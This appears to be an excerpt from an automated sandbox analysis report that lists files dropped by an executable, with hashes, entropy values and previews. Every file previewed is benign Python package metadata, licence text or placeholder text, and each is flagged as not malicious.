                                                                                                                                                                                                                              SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1053
                                                                                                                                                                                                                              Entropy (8bit):5.0945274555157285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:arOJH7H0yxgtUHw1hC09QHOsUv4eOk4/+/m3oqLFh:aSJrlxEvdQHOs5exm3ogFh
                                                                                                                                                                                                                              MD5:3396EA30F9D21389D7857719816F83B5
                                                                                                                                                                                                                              SHA1:0D43A836DAC65C0EA426AD49C881A1086600BF85
                                                                                                                                                                                                                              SHA-256:09F1C8C9E941AF3E584D59641EA9B87D83C0CB0FD007EB5EF391A7E2643C1A46
                                                                                                                                                                                                                              SHA-512:D43092223392EDDA3BD777625F5BF54ACB0CC00C25555A4F8A16DB9CCDAFC380D3204486CB2A5FDC9D3F9E459B1FED948FFC7000AA0E40F37B807A01F4421294
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Copyright (c) 2012 Erik Rose..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH THE SO
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):36293
                                                                                                                                                                                                                              Entropy (8bit):3.717596190655759
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:bs9cnyPtWIRmL0QnCHx4Zi3XBB9GcF89oi+odVBqCv9d3m24TeYH5AvDpG27IFf5:Ua+H1Nsg/
                                                                                                                                                                                                                              MD5:5BA05B51B603386707E1E3A101CDD6B3
                                                                                                                                                                                                                              SHA1:FFCCEC7FD799CC4AB07530954FEF3BE2472E2C23
                                                                                                                                                                                                                              SHA-256:0453BDD0EF9F2CD89540CA63EE8212E73B73809514419DD3037D8FE471F737E0
                                                                                                                                                                                                                              SHA-512:FE7F7D6B6C8089B09A18930EF462BA4C7A15EAF6D3E8610AC655ECADE16CE31D9C01ECE84C88A3C2D9DD34DE70E194A020E28179CF33B21389EE3EEFC7229B74
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: more-itertools.Version: 10.3.0.Summary: More routines for operating on iterables, beyond itertools.Keywords: itertools,iterator,iteration,filter,peek,peekable,chunk,chunked.Author-email: Erik Rose <erikrose@grinchcentral.com>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Natural Language :: English.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: Py
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1259
                                                                                                                                                                                                                              Entropy (8bit):5.794423512787632
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:Bhxn/2zDahxvIhxphxBhxEsJXhxzvXiCflBJRHXoggtqgmf7WJhmsxmwG:hnuXwOph5J3zvXi4Lo7qgQ7WJhS
                                                                                                                                                                                                                              MD5:178EE325409DD28809AD3661E8819EF8
                                                                                                                                                                                                                              SHA1:F5844FAC6E3C9133FE5F1B8195EE801959801DF3
                                                                                                                                                                                                                              SHA-256:77C8E73E018DC0FD7E9ED6C80B05A4404545F641FB085220CE42B368B59AA3D3
                                                                                                                                                                                                                              SHA-512:2DB06B622F644674BF7D7AD8B780F9802858D15D73B5075139C2D82181DD6D589B90172BCA7AE9C785E705F447F523DB2AE641826C550C599551A7D8C2396FC2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:more_itertools-10.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..more_itertools-10.3.0.dist-info/LICENSE,sha256=CfHIyelBrz5YTVlkHqm4fYPAyw_QB-te85Gn4mQ8GkY,1053..more_itertools-10.3.0.dist-info/METADATA,sha256=BFO90O-fLNiVQMpj7oIS5ztzgJUUQZ3TA32P5HH3N-A,36293..more_itertools-10.3.0.dist-info/RECORD,,..more_itertools-10.3.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..more_itertools-10.3.0.dist-info/WHEEL,sha256=rSgq_JpHF9fHR1lx53qwg_1-2LypZE_qmcuXbVUq948,81..more_itertools/__init__.py,sha256=dtAbGjTDmn_ghiU5YXfhyDy0phAlXVdt5klZA5fUa-Q,149..more_itertools/__init__.pyi,sha256=5B3eTzON1BBuOLob1vCflyEb2lSd6usXQQ-Cv-hXkeA,43..more_itertools/__pycache__/__init__.cpython-312.pyc,,..more_itertools/__pycache__/more.cpython-312.pyc,,..more_itertools/__pycache__/recipes.cpython-312.pyc,,..more_itertools/more.py,sha256=1E5kzFncRKTDw0cYv1yRXMgDdunstLQd1QStcnL6U90,148370..more_itertools/more.pyi,sha256=iXXeqt48Nxe8VGmIWpkVXuKpR2FYNuu2DU8nQL
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFML6KjP+tPCCfA5I:Rt1QqL6gWBB3
                                                                                                                                                                                                                              MD5:FE76A5D309B5416824C2034FBF8A16CD
                                                                                                                                                                                                                              SHA1:5975EB6043863B0D018A5D751293F38E0B8E2874
                                                                                                                                                                                                                              SHA-256:AD282AFC9A4717D7C7475971E77AB083FD7ED8BCA9644FEA99CB976D552AF78F
                                                                                                                                                                                                                              SHA-512:6E4610171DD4E7E49FB4570CF3562D26A4F171FF67DA0F3A259A77916ACB939C8FCA7DA9F473EFAD839947796AC8CD7385DAA3264ADB150FF131A5C0FAC9329C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.8.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):197
                                                                                                                                                                                                                              Entropy (8bit):4.510719529760597
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreBNA2eBKmJozlMHuO:h9Co8FyQjkDYc5tWreBN0n2mH1
                                                                                                                                                                                                                              MD5:FAADAEDCA9251A90B205C9167578CE91
                                                                                                                                                                                                                              SHA1:ED1FCABA1DBBF55113ABB419A484F3DF63E7ECFC
                                                                                                                                                                                                                              SHA-256:CAD1EF5BD340D73E074BA614D26F7DEACA5C7940C3D8C34852E65C4909686C48
                                                                                                                                                                                                                              SHA-512:1E69C89558FFE39E5C1EBB6728C4F0EB6023563C7A7F31B5417A8EFCC906378D2E2AF7B0E06A66980FBAAB7996AEB2AE1EA3918FDBE5FFCC3F77EA888A68EFBC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to this software is made.under the terms of *both* these licenses..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10174
                                                                                                                                                                                                                              Entropy (8bit):4.3908324771089084
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLhP:U9vlKM1zJlFvmNz5VrZ
                                                                                                                                                                                                                              MD5:2EE41112A44FE7014DCE33E26468BA93
                                                                                                                                                                                                                              SHA1:598F87F072F66E2269DD6919292B2934DBB20492
                                                                                                                                                                                                                              SHA-256:0D542E0C8804E39AA7F37EB00DA5A762149DC682D7829451287E11B938E94594
                                                                                                                                                                                                                              SHA-512:27B8C0252EAE50CA3CE02AB7C5670664C0C824E03EB3DA1089F3F0A00D23E648A956BCB9F53645C6D79674A87C4CC86D1085DC335911BE0210D691336B121857
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1344
                                                                                                                                                                                                                              Entropy (8bit):5.070827944686827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:fjUnoorbOFFTJJyRrYFTjz796432s4EOkUs8gROF32s3yTtTf413tf9fsZlTHv:fkOFJSrYJR6432svI32s3Stc13tfyTHv
                                                                                                                                                                                                                              MD5:7BEF9BF4A8E4263634D0597E7BA100B8
                                                                                                                                                                                                                              SHA1:FDC0E4EABC45522B079DEFF7D03D70528D775DC0
                                                                                                                                                                                                                              SHA-256:B70E7E9B742F1CC6F948B34C16AA39FFECE94196364BC88FF0D2180F0028FAC5
                                                                                                                                                                                                                              SHA-512:96C3273D51B83B6AE1AB85FEFB814DCD6C1E60D311D412242405AA429CC860412477CBD6ECE171408DBB85F0C4FD742E3AF20C758015BC48406AA65A1AB6F60A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Copyright (c) Donald Stufft and individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE.DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE.FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL.DAMAGES (INCLUDING, BUT NOT LIM
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3204
                                                                                                                                                                                                                              Entropy (8bit):4.9859857663557925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DRKnOkaMktjaVMxsxCp5QXFfFKiYEvA9TzBnyD:psZfFhgXNG
                                                                                                                                                                                                                              MD5:3236C0D7091D4A6577FA30E061480CEC
                                                                                                                                                                                                                              SHA1:F99865B8D3B90AD64A0060F7F2F4C6E4FAEB0A39
                                                                                                                                                                                                                              SHA-256:5F7A283B75A709FCCD481AEA42379F083D4F3801753365922E6B0732042515D9
                                                                                                                                                                                                                              SHA-512:A9F0BC43A135732510B98E9C0B7F997D9557A6069352372F1AC3216F0E66FA617D9597990904935D58E5139FB34E17995BFA8B95B90C71997206A2B6955FE867
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: packaging.Version: 24.1.Summary: Core utilities for Python packages.Author-email: Donald Stufft <donald@stufft.io>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3.13.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2565
                                                                                                                                                                                                                              Entropy (8bit):5.780503861671858
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:bsnuXksXW2Bsv8VsQ7lEsahOsbs5Jhsde8UogvtJkHpHAfEcysrD5WJeCzESowj:vXrW2s8JsMdVogvtJkJgfksP5qeCzOwj
                                                                                                                                                                                                                              MD5:88FBF3C6BD08040482212DAD5A8EAB02
                                                                                                                                                                                                                              SHA1:E7EE66942F7321FB77888D492D57C2EEEA1A5171
                                                                                                                                                                                                                              SHA-256:38A6898306293627C81E2B2D8A93E5F6857D5F7EDB73F0334E8D9A53DAD53B6E
                                                                                                                                                                                                                              SHA-512:786AE1F883A999A0939C22A756F90D74CC7F87AAF13F6FFF22D8D962D213A1ECBC6AAE2890A5D7347487824CD0E9EB440A3923F01F938EEF068719DFEEE96554
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:packaging-24.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..packaging-24.1.dist-info/LICENSE,sha256=ytHvW9NA1z4HS6YU0m996spceUDD2MNIUuZcSQlobEg,197..packaging-24.1.dist-info/LICENSE.APACHE,sha256=DVQuDIgE45qn836wDaWnYhSdxoLXgpRRKH4RuTjpRZQ,10174..packaging-24.1.dist-info/LICENSE.BSD,sha256=tw5-m3QvHMb5SLNMFqo5_-zpQZY2S8iP8NIYDwAo-sU,1344..packaging-24.1.dist-info/METADATA,sha256=X3ooO3WnCfzNSBrqQjefCD1POAF1M2WSLmsHMgQlFdk,3204..packaging-24.1.dist-info/RECORD,,..packaging-24.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..packaging-24.1.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..packaging/__init__.py,sha256=dtw2bNmWCQ9WnMoK3bk_elL1svSlikXtLpZhCFIB9SE,496..packaging/__pycache__/__init__.cpython-312.pyc,,..packaging/__pycache__/_elffile.cpython-312.pyc,,..packaging/__pycache__/_manylinux.cpython-312.pyc,,..packaging/__pycache__/_musllinux.cpython-312.pyc,,..packaging/__pycache__/_parser.cpython-312.pyc,,
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11429
                                                                                                                                                                                                                              Entropy (8bit):5.039575520713946
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:n9x/tlCtlsaCUpVQ7yHwgNF8NFvWVDM1RnzadSibNTTh+fOnnxa6jlES4h8a8KAH:3/tlCfsqpq7ydZzM0dGiCbvHcjNj61TA
                                                                                                                                                                                                                              MD5:12306075DF09A0DBB93315FADDDF73FB
                                                                                                                                                                                                                              SHA1:1AC8A3679AFCFEEC0BA00851F5F8095DD1B060CD
                                                                                                                                                                                                                              SHA-256:CE6B227B4D46D4CB57474C2022FE57A557933BB89DAF4596BDF9B12AC296B869
                                                                                                                                                                                                                              SHA-512:BA0A72B888A14F82FD44FB103C01EF0900B5302F18E986A8264A9A08AB77D1C655C392374FD7B0A98BEF9B9511F6EC78AF3EF8936091C80A0B5364F7A53DC20A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.3.Name: platformdirs.Version: 4.2.2.Summary: A small Python package for determining appropriate platform-specific dirs, e.g. a `user data dir`..Project-URL: Documentation, https://platformdirs.readthedocs.io.Project-URL: Homepage, https://github.com/platformdirs/platformdirs.Project-URL: Source, https://github.com/platformdirs/platformdirs.Project-URL: Tracker, https://github.com/platformdirs/platformdirs/issues.Maintainer-email: Bern.t G.bor <gaborjbernat@gmail.com>, Julian Berman <Julian@GrayVines.com>, Ofek Lev <oss@ofek.dev>, Ronny Pfannschmidt <opensource@ronnypfannschmidt.de>.License-Expression: MIT.License-File: LICENSE.Keywords: appdirs,application,cache,directory,log,user.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1642
                                                                                                                                                                                                                              Entropy (8bit):5.780720255872038
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:bn/2zDzoobEsJhfPWcs013+pj456szN6lnhta57WJ+guQg4:bnuXcob5Jhfucs+d49hta9WJ+g1X
                                                                                                                                                                                                                              MD5:0E141A28570FC62974FC5CEADFE808E3
                                                                                                                                                                                                                              SHA1:7B92561C5BBBA83D6E16A1C7B195089ACA1766AF
                                                                                                                                                                                                                              SHA-256:4C211D76D42ED40EFC3ACFCC866D8912A718AFBCA2B7E51849442366D6E99FE8
                                                                                                                                                                                                                              SHA-512:830721C18A35AECD1EFB81A5FAAF8AC0EA02428EDC5B294458556343788D894B76035F1E661214D975DF2A64DC8C3D6AAA7A53A99BE64B9413B6A5D89D549F9D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:platformdirs-4.2.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..platformdirs-4.2.2.dist-info/METADATA,sha256=zmsie01G1MtXR0wgIv5XpVeTO7idr0WWvfmxKsKWuGk,11429..platformdirs-4.2.2.dist-info/RECORD,,..platformdirs-4.2.2.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..platformdirs-4.2.2.dist-info/WHEEL,sha256=zEMcRr9Kr03x1ozGwg5v9NQBKn3kndp6LSoSlVg-jhU,87..platformdirs-4.2.2.dist-info/licenses/LICENSE,sha256=KeD9YukphQ6G6yjD_czwzv30-pSHkBHP-z0NS-1tTbY,1089..platformdirs/__init__.py,sha256=EMGE8qeHRR9CzDFr8kL3tA8hdZZniYjXBVZd0UGTWK0,22225..platformdirs/__main__.py,sha256=HnsUQHpiBaiTxwcmwVw-nFaPdVNZtQIdi1eWDtI-MzI,1493..platformdirs/__pycache__/__init__.cpython-312.pyc,,..platformdirs/__pycache__/__main__.cpython-312.pyc,,..platformdirs/__pycache__/android.cpython-312.pyc,,..platformdirs/__pycache__/api.cpython-312.pyc,,..platformdirs/__pycache__/macos.cpython-312.pyc,,..platformdirs/__pycache__/unix.cpython-312.pyc,,..platformdirs/__p
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):87
                                                                                                                                                                                                                              Entropy (8bit):4.730668933656452
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXAaCTR73RP+tPCCfA5I:Rt2PFRWBB3
                                                                                                                                                                                                                              MD5:8895639B8515B3094302B59E28AFB562
                                                                                                                                                                                                                              SHA1:FBD4DA759EA5BEB65AE820DFBC47F9B569E89519
                                                                                                                                                                                                                              SHA-256:CC431C46BF4AAF4DF1D68CC6C20E6FF4D4012A7DE49DDA7A2D2A1295583E8E15
                                                                                                                                                                                                                              SHA-512:B53C0978DAD2A7195058ABC7B7D20A229EC617BDDBB364D8ED2354F37D5071208735774350F9FBBA5C804BEFCEFE71C27BC5E468E12899DF4687189C468785A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: hatchling 1.24.2.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1089
